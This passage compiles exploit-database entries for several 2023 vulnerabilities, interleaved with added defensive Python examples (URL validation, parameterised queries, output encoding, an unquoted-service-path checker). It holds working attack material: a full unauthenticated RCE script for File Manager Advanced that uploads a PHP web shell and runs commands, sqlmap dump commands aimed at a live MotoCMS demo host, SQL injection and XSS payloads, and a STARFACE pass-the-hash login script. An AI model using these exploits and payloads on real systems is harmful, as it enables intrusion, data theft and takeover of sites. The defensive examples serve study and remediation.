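        # runs is_non_routable() on every returned address before connecting,
        # and repeats both checks for every redirect target.
        pass
    return True, "ok"


def check_remote_download_job(json_parameters):
    """Validate every URL in a job's JsonParameters string; returns [(url, allowed, reason)]."""
    params = json.loads(json_parameters)
    urls = params.get("urls", [])
    if not isinstance(urls, list):
        raise ValueError('"urls" must be a list')
    return [(u,) + validate_download_url(u) for u in urls]


# Constructed job parameters in the shape the advisory's PoC sends (not real data).
SAMPLE_JOB = json.dumps({
    "urls": ["http://localhost:8000/internal.html",
             "http://169.254.169.254/latest/meta-data/",
             "https://example.com/public/report.pdf"],
    "target": "personal-files",
})

if __name__ == "__main__":
    for url, allowed, reason in check_remote_download_job(SAMPLE_JOB):
        print("ALLOW" if allowed else "DENY ", url, "-", reason)
```

The check is deliberately applied per URL rather than once per job, so a list that mixes an internal and an external target is reported entry by entry; the job should be refused if any entry is denied. Decimal or octal IP spellings ("2130706433", "0177.0.0.1") are not parsed as literals by ipaddress and reach the resolution step, which is why that step must not be skipped in production.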
-
Enrollment System Project v1.0 - SQL Injection Authentication Bypass (SQLI)
# Exploit Title: Enrollment System Project v1.0 - SQL Injection Authentication Bypass (SQLI)
# Date found: 18/05/2023
# Exploit Author: VIVEK CHOUDHARY @sudovivek
# Version: V1.0
# Tested on: Windows 10
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14444/enrollment-system-project-source-code-using-phpmysql.html
# CVE: CVE-2023-33584
# CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-33584

Vulnerability Description -

Enrollment System Project V1.0, developed by Sourcecodester, has been found to be vulnerable to SQL Injection (SQLI) attacks. This vulnerability allows an attacker to manipulate the SQL queries executed by the application. The system fails to properly validate user-supplied input in the username and password fields during the login process, enabling an attacker to inject malicious SQL code. By exploiting this vulnerability, an attacker can bypass authentication and gain unauthorized access to the system.

Steps to Reproduce -

The following steps outline the exploitation of the SQL Injection vulnerability in Enrollment System Project V1.0:

1. Launch the Enrollment System Project V1.0 application.
2. Open the login page by accessing the URL: http://localhost/enrollment/login.php.
3. In the username and password fields, insert the following SQL Injection payload shown inside brackets to bypass authentication: {' or 1=1 #}.
4. Click the login button to execute the SQL Injection payload.

As a result of successful exploitation, the attacker gains unauthorized access to the system and is logged in with administrative privileges.
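The root cause described above is a login query assembled from the raw username and password fields. The following is an added example, not code from the Enrollment System Project or from the exploit author: it rebuilds a minimal login check in Python against a constructed in-memory SQLite table, once with string concatenation and once with a parameterised query plus a hashed, constant-time password comparison, so the two behaviours can be run side by side. SQLite terminates a line comment with "--" rather than MySQL's "#", so the payload in the test uses that form; the demo salt and the "admin" account are constructed.

```python
"""Login check with a parameterised query versus string concatenation.

Added example; this is not code from the Enrollment System Project. The
users table, salt and account below are constructed for the demo.
"""
import hashlib
import hmac
import sqlite3

# Fixed demo salt. A real application stores a random per-user salt
# (or uses a dedicated password hash such as bcrypt or argon2).
DEMO_SALT = b"constructed-demo-salt"


def hash_password(password):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), DEMO_SALT, 50_000).hex()


def build_demo_db():
    """Create an in-memory users table with one constructed account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password_hash TEXT NOT NULL)")
    conn.execute("INSERT INTO users VALUES (?, ?)", ("admin", hash_password("correct-horse")))
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Query built by concatenation: the username becomes part of the SQL text,
    so a quote followed by OR 1=1 and a comment marker short-circuits the WHERE clause."""
    sql = ("SELECT username FROM users WHERE username = '%s' AND password_hash = '%s'"
           % (username, hash_password(password)))
    return conn.execute(sql).fetchone() is not None


def login_secure(conn, username, password):
    """Parameterised lookup: the username is bound as a value, never parsed as SQL.
    The password is compared against the stored hash in constant time."""
    row = conn.execute(
        "SELECT password_hash FROM users WHERE username = ?", (username,)
    ).fetchone()
    if row is None:
        return False
    return hmac.compare_digest(row[0], hash_password(password))


if __name__ == "__main__":
    db = build_demo_db()
    probe = "' OR 1=1 -- "
    print("concatenated query, injected username:", login_vulnerable(db, probe, "anything"))
    print("parameterised query, injected username:", login_secure(db, probe, "anything"))
    print("parameterised query, real credentials:", login_secure(db, "admin", "correct-horse"))
```

With the parameterised query the injected text is looked up as a literal username, finds no row and fails closed; the concatenated version returns the first row of the table for the same input, which is the behaviour the advisory describes.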
-
MotoCMS Version 3.4.3 - SQL Injection
# Title: MotoCMS Version 3.4.3 - SQL Injection
# Author: tmrswrr
# Date: 01/06/2023
# Vendor: https://www.motocms.com
# Link: https://www.motocms.com/website-templates/demo/189526.html
# Vulnerable Version(s): MotoCMS 3.4.3

## Description

MotoCMS Version 3.4.3 SQL Injection via the keyword parameter.

## Steps to Reproduce

1) By visiting the url: https://template189526.motopreview.com/store/category/search/?keyword=1

2) Run

   sqlmap -u "https://template189526.motopreview.com/store/category/search/?keyword=1" --random-agent --level 5 --risk 3 --batch

   and this command

   sqlmap -u "https://template189526.motopreview.com/store/category/search/?keyword=1*" --random-agent --level 5 --risk 3 --batch --timeout=10 --drop-set-cookie -o --dump

### Parameter & Payloads ###

Parameter: keyword (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: keyword=1%' AND 3602=3602 AND 'ZnYV%'='ZnYV

Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: https://template189526.motopreview.com:443/store/category/search/?keyword=1%' AND 6651=6651 AND 'BvJE%'='BvJE
-
File Manager Advanced Shortcode 2.3.2 - Unauthenticated Remote Code Execution (RCE)
# Exploit Title: File Manager Advanced Shortcode 2.3.2 - Unauthenticated Remote Code Execution (RCE)
# Date: 05/31/2023
# Exploit Author: Mateus Machado Tesser
# Vendor Homepage: https://advancedfilemanager.com/
# Version: File Manager Advanced Shortcode 2.3.2
# Tested on: Wordpress 6.1 / Linux (Ubuntu) 5.15
# CVE: CVE-2023-2068

import requests
import json
import pprint
import sys
import re

PROCESS = "\033[1;34;40m[*]\033[0m"
SUCCESS = "\033[1;32;40m[+]\033[0m"
FAIL = "\033[1;31;40m[-]\033[0m"

try:
    COMMAND = sys.argv[2]
    IP = sys.argv[1]
    if len(COMMAND) > 1:
        pass
    if IP:
        pass
    else:
        print(f'Use: {sys.argv[0]} IP COMMAND')
except:
    pass

url = 'http://'+IP+'/'  # Path to File Manager Advanced Shortcode Panel

print(f"{PROCESS} Searching fmakey")
try:
    r = requests.get(url)
    raw_fmakey = r.text
    fmakey = re.findall('_fmakey.*$', raw_fmakey, re.MULTILINE)[0].split("'")[1]
    if len(fmakey) == 0:
        print(f"{FAIL} Cannot found fmakey!")
except:
    print(f"{FAIL} Cannot found fmakey!")

print(f'{PROCESS} Exploiting Unauthenticated Remote Code Execution via AJAX!')
url = "http://"+IP+"/wp-admin/admin-ajax.php"
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36",
           "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryI52DGCOt37rixRS1",
           "Accept": "*/*"}
data = "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"reqid\"\r\n\r\n\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"target\"\r\n\r\nl1_Lw\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"hashes[l1_cG5nLWNsaXBhcnQtaGFja2VyLWhhY2tlci5wbmc]\"\r\n\r\nexploit.php\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nfma_load_shortcode_fma_ui\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"_fmakey\"\r\n\r\n"+fmakey+"\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"path\"\r\n\r\n\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"url\"\r\n\r\n\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"w\"\r\n\r\nfalse\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"r\"\r\n\r\ntrue\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"hide\"\r\n\r\nplugins\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"operations\"\r\n\r\nupload,download\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"path_type\"\r\n\r\ninside\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"hide_path\"\r\n\r\nno\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"enable_trash\"\r\n\r\nno\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"upload_allow\"\r\n\r\ntext/x-php\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"upload_max_size\"\r\n\r\n2G\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"exploit2.php\"\r\nContent-Type: text/x-php\r\n\r\n<?php system($_GET['cmd']);?>\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"mtime[]\"\r\n\r\n\r\n------WebKitFormBoundaryI52DGCOt37rixRS1--\r\n"

r = requests.post(url, headers=headers, data=data)
print(f"{PROCESS} Sending AJAX request to: {url}")

if 'errUploadMime' in r.text:
    print(f'{FAIL} Exploit failed!')
    sys.exit()
elif r.headers['Content-Type'].startswith("text/html"):
    print(f'{FAIL} Exploit failed! Try to change _fmakey')
    sys.exit(0)
else:
    print(f'{SUCCESS} Exploit executed with success!')
    exploited = json.loads(r.text)
    url = ""
    print(f'{PROCESS} Getting URL with webshell')
    for i in exploited["added"]:
        url = i['url']
    print(f"{PROCESS} Executing '{COMMAND}'")
    r = requests.get(url+'?cmd='+COMMAND)
    print(f'{SUCCESS} The application returned ({len(r.text)} length):\n'+r.text)
-
STARFACE 7.3.0.10 - Authentication with Password Hash Possible
Exploit Title: STARFACE 7.3.0.10 - Authentication with Password Hash Possible
Affected Versions: 7.3.0.10 and earlier versions
Fixed Versions: -
Vulnerability Type: Broken Authentication
Security Risk: low
Vendor URL: https://www.starface.de
Vendor Status: notified
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2022-004
Advisory Status: published
CVE: CVE-2023-33243
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-33243

Introduction
============

"When functionality and comfort come together, the result is a
state-of-the-art experience that we've dubbed 'comfortphoning'. It's a
secure, scalable digital communication solution that meets every need
and wish. STARFACE is easy to integrate into existing IT systems and
flexibly grows with your requirements."
(from the vendor's homepage)

More Details
============

The image of STARFACE PBX [0] in version 7.3.0.10 can be downloaded from
the vendor's homepage [1]. The included files can be further examined by
either extracting the contents or running the image in a virtual
machine.

The web interface of the PBX uses the JavaScript file at the following
path to submit the login form:

------------------------------------------------------------------------
js/prettifier.js
------------------------------------------------------------------------

The following two lines of the JavaScript file "prettifier.js" add the
two parameters "secret" and "ack" to the form before being submitted:

------------------------------------------------------------------------
$form(document.forms[0]).add('secret', createHash(defaultVals.isAd, liv, lpv, defaultVals.k + defaultVals.bk));
$form(document.forms[0]).add('ack', defaultVals.k);
------------------------------------------------------------------------

The JavaScript object "defaultVals" is included in the web application's
source text. While the value of "defaultVals.k" was found to be the
static hash of the PBX version, the value of "defaultVals.bk" contains a
nonce only valid for the currently used session. Therefore, the form
parameter "ack" is always the same value.

For the form value "secret" the function "createHash()" is called with
different arguments. The value of "defaultVals.isAd" is set to "false"
when login via Active Directory is disabled. The parameters "liv" and
"lpv" contain the username and password entered into the form
respectively.

------------------------------------------------------------------------
const createHash = function (isAD, user, pass, nonces) {
  if (isAD) {
    return forAD.encode(user + nonces + pass);
  }
  return user + ':' + forSF(user + nonces + forSF(pass));
};
------------------------------------------------------------------------

The expression right after the second return statement is the
implementation used when Active Directory login is disabled, which is the
default setting. The return value is composed of the username separated
via a colon from a value built using the "forSF()" function. The
"forSF()" function was found to calculate the SHA512 hash value. When
considering the arguments passed to the function, the hash is calculated
as follows:

------------------------------------------------------------------------
SHA512(username + defaultVals.k + defaultVals.bk + SHA512(password))
------------------------------------------------------------------------

As can be seen, instead of the cleartext password the SHA512 hash of the
password is used in the calculation. In conclusion, for the form value
"secret" the following value is transmitted:

------------------------------------------------------------------------
username + ":" + SHA512(
  username + defaultVals.k + defaultVals.bk + SHA512(password)
)
------------------------------------------------------------------------

If the SHA512 hash of a user's password is known, it can be directly used
in the calculation of the "secret" during the login process. Knowledge
of the cleartext password is not required. This finding was also
verified by analysing the decompiled Java code of the server component.
It was also found that the authentication process of the REST API is
vulnerable in a very similar manner.

Proof of Concept
================

The following Python script can be used to perform a login by specifying
a target URL, a username and the associated password hash:

------------------------------------------------------------------------
#!/usr/bin/env python3

import click
import hashlib
import re
import requests
import typing


def get_values_from_session(url, session) -> typing.Tuple[str, str]:
    k, bk = "", ""
    response_content = session.get(f"{url}/jsp/index.jsp").text
    # Raw strings: "\s" is not a valid escape sequence in a normal Python string.
    k_result = re.search(r"\sk : '([^']+)'", response_content)
    bk_result = re.search(r"\sbk : '([^']+)'", response_content)
    if k_result != None:
        k = k_result.group(1)
    if bk_result != None:
        bk = bk_result.group(1)
    return k, bk


def web_login(url, login, pwhash, session) -> bool:
    version, nonce = get_values_from_session(url, session)
    if version == "" or nonce == "":
        print("Web Login failed: Nonce and version hash can not be retrieved.")
        return False
    value = login + version + nonce + pwhash
    secret = hashlib.sha512(value.encode("utf-8")).hexdigest()
    data = {
        "forward": "",
        "autologin": "false",
        "secret": f"{login}:{secret}",
        "ack": version,
    }
    login_request = session.post(
        f"{url}/login",
        data=data,
        allow_redirects=False,
        headers={"Referer": f"{url}/jsp/index.jsp"},
    )
    response_headers = login_request.headers
    if "Set-Cookie" in response_headers:
        session_id = response_headers["Set-Cookie"].split("=")[1].split(";")[0]
        print(f"Session ID: {session_id}")
        return True
    else:
        print("Invalid login data")
        return False


def get_nonce_from_api(url, session) -> str:
    response_content = session.get(f"{url}/rest/login").json()
    return response_content["nonce"] if "nonce" in response_content else ""


def rest_login(url, login, pwhash, session):
    nonce = get_nonce_from_api(url, session)
    if nonce == "":
        print("REST Login failed: Nonce can not be retrieved.")
        return
    value = login + nonce + pwhash
    secret = hashlib.sha512(value.encode("utf-8")).hexdigest()
    data = {"loginType": "Internal", "nonce": nonce, "secret": f"{login}:{secret}"}
    login_request = session.post(
        f"{url}/rest/login",
        json=data,
        headers={"Content-Type": "application/json", "X-Version": "2"},
    )
    response_data = login_request.json()
    token = response_data["token"] if "token" in response_data else "none"
    print(f"REST API Token: {token}")


@click.command()
@click.option('--url', help='Target System URL', required=True)
@click.option('--login', help='Login ID', required=True)
@click.option('--pwhash', help='Password Hash', required=True)
def login(url, login, pwhash):
    session = requests.session()
    stripped_url = url.rstrip("/")
    result = web_login(stripped_url, login, pwhash, session)
    if result:
        rest_login(stripped_url, login, pwhash, session)


if __name__ == "__main__":
    login()
------------------------------------------------------------------------

For example, the SHA512 hash of the password "starface" can be
calculated as follows:

------------------------------------------------------------------------
$ echo -n "starface" | sha512sum
a37542915e834f6e446137d759cdcb825a054d0baab73fd8db695fc49529bc8e52eb27979dd1dcc21849567bac74180f6511121f76f4a2a1f196670b7375f8ec  -
------------------------------------------------------------------------

The Python script can be run as follows to perform a login as the user
"0001" with the aforementioned hash:

------------------------------------------------------------------------
$ python3 login.py --url 'https://www.example.com' --login 0001 --pwhash 'a37542915e834f6e446137d759cdcb825a054d0baab73fd8db695fc49529bc8e52eb27979dd1dcc21849567bac74180f6511121f76f4a2a1f196670b7375f8ec'
Session ID: 2CF09656E274F000FFAD023AF37629CE
REST API Token: 51eef8f8vp3d3u81k0imjbuuu7
------------------------------------------------------------------------

When the password hash is valid for the specified user of the targeted
instance, a session ID as well as a REST API token is returned.
Afterwards, these values can be used to interact with the web
application and the REST API.

Workaround
==========

None

Fix
===

On 4 May 2023, version 8.0.0.11 was released. In this version the
vulnerability was addressed with a temporary solution, such that the
password hashes are encrypted before they are saved in the database.
This approach prevents attackers from exploiting this vulnerability in
scenarios where they have only acquired pure database access. However,
attackers with system level access can bypass this temporary measure as
they can extract the encryption key and decrypt the hashes in the
database. A solution that fixes this vulnerability entirely is still in
progress.

Security Risk
=============

The web interface and REST API of STARFACE allow logging in using the
password hash instead of the cleartext password. This can be exploited
by attackers who gained access to the application's database where the
passwords are also saved as a SHA512 hash of the cleartext passwords.
While the precondition for this attack could be the full compromise of
the STARFACE PBX, another attack scenario could be that attackers
acquire access to backups of the database stored on another system.
Furthermore, the login via password hash allows attackers permanent
unauthorised access to the web interface even if system access was
obtained only temporarily. Due to the prerequisites of obtaining access
to password hashes, the vulnerability poses a low risk only.

Timeline
========

2022-12-06 Vulnerability identified
2022-12-13 Customer approved disclosure to vendor
2023-01-11 Vendor notified
2023-05-04 Vendor released new version 8.0.0.11
2023-05-19 CVE ID requested
2023-05-20 CVE ID assigned
2023-06-01 Advisory released

References
==========

[0] https://starface.com/en/products/comfortphoning/
[1] https://knowledge.starface.de/pages/viewpage.action?pageId=46564694

RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/

Working at RedTeam Pentesting
=============================

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://jobs.redteam-pentesting.de/

--
RedTeam Pentesting GmbH                     Tel.: +49 241 510081-0
Alter Posthof 1                             Fax : +49 241 510081-99
52062 Aachen                                https://www.redteam-pentesting.de
Germany                                     Registergericht: Aachen HRB 14004
Geschäftsführer: Patrick Hof, Jens Liebchen
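The advisory's core point is that the server can only validate "secret" by recomputing it from the stored SHA512(password), so that stored hash is itself a credential. The following added example (not the advisory's PoC and not STARFACE code) works the formula through for the web and REST variants with constructed placeholder values for defaultVals.k, defaultVals.bk and the REST nonce, and shows the two derivations, from the cleartext password and from the stored hash alone, produce the same value the server accepts.

```python
import hashlib
import hmac


def sha512_hex(data: str) -> str:
    return hashlib.sha512(data.encode("utf-8")).hexdigest()


def secret_from_password(login: str, k: str, bk: str, password: str) -> str:
    """What prettifier.js sends: username:SHA512(username + k + bk + SHA512(password))."""
    return f"{login}:{sha512_hex(login + k + bk + sha512_hex(password))}"


def secret_from_hash(login: str, k: str, bk: str, pw_hash: str) -> str:
    """The same value computed from a stored SHA512(password); no cleartext needed."""
    return f"{login}:{sha512_hex(login + k + bk + pw_hash)}"


def rest_secret_from_hash(login: str, nonce: str, pw_hash: str) -> str:
    """REST API variant from the advisory: username:SHA512(username + nonce + SHA512(password))."""
    return f"{login}:{sha512_hex(login + nonce + pw_hash)}"


def server_accepts(stored_pw_hash: str, login: str, k: str, bk: str, presented: str) -> bool:
    """Server-side check. The only verifier it holds is the stored hash, so the
    expected value is derived exactly the way an attacker holding that hash derives it."""
    expected = secret_from_hash(login, k, bk, stored_pw_hash)
    return hmac.compare_digest(expected, presented)


# Constructed sample values; the real k is the version hash and bk a per-session nonce.
K_VERSION = "versionhash-placeholder"
BK_NONCE = "session-nonce-placeholder"
REST_NONCE = "rest-nonce-placeholder"
STORED_HASH = sha512_hex("starface")  # what the database would hold for user 0001

if __name__ == "__main__":
    via_password = secret_from_password("0001", K_VERSION, BK_NONCE, "starface")
    via_hash = secret_from_hash("0001", K_VERSION, BK_NONCE, STORED_HASH)
    print("same secret from password and from hash:", via_password == via_hash)
    print("server accepts hash-derived secret:",
          server_accepts(STORED_HASH, "0001", K_VERSION, BK_NONCE, via_hash))
    print("REST secret from hash:", rest_secret_from_hash("0001", REST_NONCE, STORED_HASH)[:24], "...")
```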
-
Tree Page View Plugin 1.6.7 - Cross Site Scripting (XSS)
# Exploit Title: Tree Page View Plugin 1.6.7 - Cross Site Scripting (XSS)
# Google Dork: inurl:/wp-content/plugins/cms-tree-page-view/
# Date: 2023-04-24
# Exploit Author: LEE SE HYOUNG (hackintoanetwork)
# Vendor Homepage: https://wordpress.org/plugins/cms-tree-page-view/
# Software Link: https://downloads.wordpress.org/plugin/cms-tree-page-view.1.6.6.zip
# Category: Web Application
# Version: 1.6.7
# Tested on: Debian / WordPress 6.1.1
# CVE : CVE-2023-30868
# Reference: https://patchstack.com/database/vulnerability/cms-tree-page-view/wordpress-cms-tree-page-view-plugin-1-6-7-cross-site-scripting-xss-vulnerability?_s_id=cve

# 1. Technical Description:

The CMS Tree Page View plugin for WordPress has a Reflected Cross-Site Scripting vulnerability up to version 1.6.7. This is due to the post_type parameter not properly escaping user input. As a result, users with administrator privileges or higher can inject JavaScript code that will execute whenever accessed.

# 2. Proof of Concept (PoC):

WordPress CMS Tree Page View Plugin <= 1.6.7 Cross-Site Scripting (XSS)

In the case of this vulnerability, there are two XSS PoCs available: one for version 1.6.6 and another for version 1.6.7.

1. CMS Tree Page View Plugin <= 1.6.6
   a. Send the following URL to users with administrator privileges or higher:
      http://localhost:8888/wp-admin/edit.php?page=cms-tpv-page-post&post_type=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E.
   b. Your payload will be executed.

   [!] note : To make the payload work, the "In menu" option under Settings -> CMS Tree Page View -> Select where to show a tree for pages and custom post types needs to be enabled for posts.

2. CMS Tree Page View Plugin <= 1.6.7
   a. Send the following URL to users with administrator privileges or higher:
      http://localhost:8888/wp-admin/edit.php?page=cms-tpv-page-post&post_type=%22+accesskey%3DC+onclick%3Djavascript%3Aalert%281%29%3B+a%3D%22.
   b. Your payload will execute the script when the user presses Ctrl + Alt + c (Mac) or Alt + Shift + c (Windows).

   [!] note : To make the payload work, the "In menu" option under Settings -> CMS Tree Page View -> Select where to show a tree for pages and custom post types needs to be enabled for posts.
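The two PoCs above differ in the HTML context they rely on: the 1.6.6 one closes the attribute and opens a script tag, the 1.6.7 one never leaves the attribute and only adds accesskey/onclick. The following added example (not the plugin's code; the `<input>` template is a hypothetical stand-in for wherever post_type is reflected) decodes both payloads from the advisory's URLs and shows that a tag-stripping filter stops only the first, while context-aware attribute encoding stops both.

```python
import html
import re
from html.parser import HTMLParser
from typing import Callable, Set
from urllib.parse import unquote_plus

# The two post_type values from the advisory's URLs, URL-decoded.
PAYLOAD_166 = unquote_plus("%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E")
PAYLOAD_167 = unquote_plus("%22+accesskey%3DC+onclick%3Djavascript%3Aalert%281%29%3B+a%3D%22")


def render(post_type: str, encode: Callable[[str], str]) -> str:
    """Hypothetical admin-page template reflecting post_type inside a quoted attribute."""
    return f'<input type="hidden" name="post_type" value="{encode(post_type)}">'


def strip_tags(value: str) -> str:
    """Blocklist-style filter: removes anything that looks like a tag and nothing else."""
    return re.sub(r"<[^>]*>", "", value)


def attr_encode(value: str) -> str:
    """Context-aware output encoding for a double-quoted HTML attribute (quotes included)."""
    return html.escape(value, quote=True)


class _InputAttrs(HTMLParser):
    """Collects the attributes the browser-side parser would see on the <input>."""

    def __init__(self) -> None:
        super().__init__()
        self.attrs: dict = {}

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            self.attrs = dict(attrs)


def injected_attributes(rendered: str) -> Set[str]:
    """Attribute names on the <input> beyond the three the template itself defines."""
    parser = _InputAttrs()
    parser.feed(rendered)
    return set(parser.attrs) - {"type", "name", "value"}


if __name__ == "__main__":
    for name, payload in (("1.6.6 payload", PAYLOAD_166), ("1.6.7 payload", PAYLOAD_167)):
        for label, enc in (("strip_tags", strip_tags), ("attr_encode", attr_encode)):
            out = render(payload, enc)
            print(f"{name} / {label}: script tag={'<script' in out.lower()} "
                  f"injected attrs={sorted(injected_attributes(out))}")
```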
-
Macro Expert 4.9 - Unquoted Service Path
# Exploit Title: Macro Expert 4.9 - Unquoted Service Path
# Date: 04/06/2023
# Exploit Author: Murat DEMIRCI
# Vendor Homepage: http://www.macro-expert.com/
# Software Link: http://www.macro-expert.com/product/gm_setup_4.9.exe
# Version: 4.9
# Tested on: Windows 10

# Proof of Concept :

C:\Users\Murat>sc qc "Macro Expert"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Macro Expert
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : c:\program files (x86)\grasssoft\macro expert\MacroService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Macro Expert
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

# If a malicious payload is inserted into the related path and the service is executed in any way, this can gain new privilege access to the system and perform malicious acts.
-
USB Flash Drives Control 4.1.0.0 - Unquoted Service Path
# Exploit Title: USB Flash Drives Control 4.1.0.0 - Unquoted Service Path
# Date: 2023-31-05
# Exploit Author: Jeffrey Bencteux
# Vendor Homepage: https://binisoft.org/
# Software Link: https://binisoft.org/wfc
# Version: 4.1.0.0
# Tested on: Microsoft Windows 11 Pro
# Vulnerability Type: Unquoted Service Path

PS C:\> wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows"
USB Flash Drives Control      usbcs      C:\Program Files\USB Flash Drives Control\usbcs.exe      Auto

PS C:\> sc.exe qc usbcs
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: usbcs
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\USB Flash Drives Control\usbcs.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : USB Flash Drives Control
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

PS C:\> systeminfo
OS Name:                   Microsoft Windows 11 Pro
OS Version:                10.0.22621 N/A Build 22621
OS Manufacturer:           Microsoft Corporation

--
Jeffrey BENCTEUX
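Both unquoted-service-path findings above (Macro Expert and USB Flash Drives Control) are recognised the same way: an auto-start service whose BINARY_PATH_NAME contains spaces and no surrounding quotes. The following added example (not from either advisory) parses `sc qc` output such as the listings above, flags the condition, and lists the intermediate paths Windows would try before the real image, which are the locations whose directory ACLs a defender needs to review; the `sc qc` text is a constructed sample modelled on the advisories' output.

```python
import re
from typing import List

# Constructed sample modelled on the `sc.exe qc usbcs` listing in the advisory.
SAMPLE_SC_QC = r"""
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: usbcs
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\USB Flash Drives Control\usbcs.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : USB Flash Drives Control
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""


def binary_path_from_sc_qc(sc_output: str) -> str:
    """Extract BINARY_PATH_NAME from `sc qc <service>` output ('' if absent)."""
    match = re.search(r"BINARY_PATH_NAME\s*:\s*(.+)", sc_output)
    return match.group(1).strip() if match else ""


def image_path(binary_path: str) -> str:
    """Drop any arguments after the executable name (e.g. 'svchost.exe -k ...')."""
    idx = binary_path.lower().find(".exe")
    return binary_path if idx == -1 else binary_path[: idx + 4]


def is_unquoted_service_path(binary_path: str) -> bool:
    """True when the image path contains a space and is not wrapped in quotes."""
    path = binary_path.strip()
    if not path or path.startswith('"'):
        return False
    return " " in image_path(path)


def lookup_candidates(binary_path: str) -> List[str]:
    """Paths CreateProcess tries, in order, before the real image when the path is
    unquoted. Each candidate's parent directory must not be writable by
    non-administrators; otherwise the finding is exploitable for privilege escalation."""
    if not is_unquoted_service_path(binary_path):
        return []
    words = image_path(binary_path.strip()).split(" ")
    return [" ".join(words[:i]) + ".exe" for i in range(1, len(words))]


if __name__ == "__main__":
    path = binary_path_from_sc_qc(SAMPLE_SC_QC)
    print("BINARY_PATH_NAME:", path)
    print("unquoted with spaces:", is_unquoted_service_path(path))
    for candidate in lookup_candidates(path):
        print("  check directory ACL for:", candidate)
```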
-
WordPress Theme Workreap 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution
# Exploit Title: WordPress Theme Workreap 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution
# Dork: inurl:/wp-content/themes/workreap/
# Date: 2023-06-01
# Category : Webapps
# Vendor Homepage: https://themeforest.net/item/workreap-freelance-marketplace-wordpress-theme/23712454
# Exploit Author: Mohammad Hossein Khanaki(Mr_B0hl00l)
# Version: 2.2.2
# Tested on: Windows/Linux
# CVE: CVE-2021-24499

import requests
import random
import string
import sys


def usage():
    banner = '''
NAME: WordPress Theme Workreap 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution

usage: python3 Workreap_rce.py <URL>

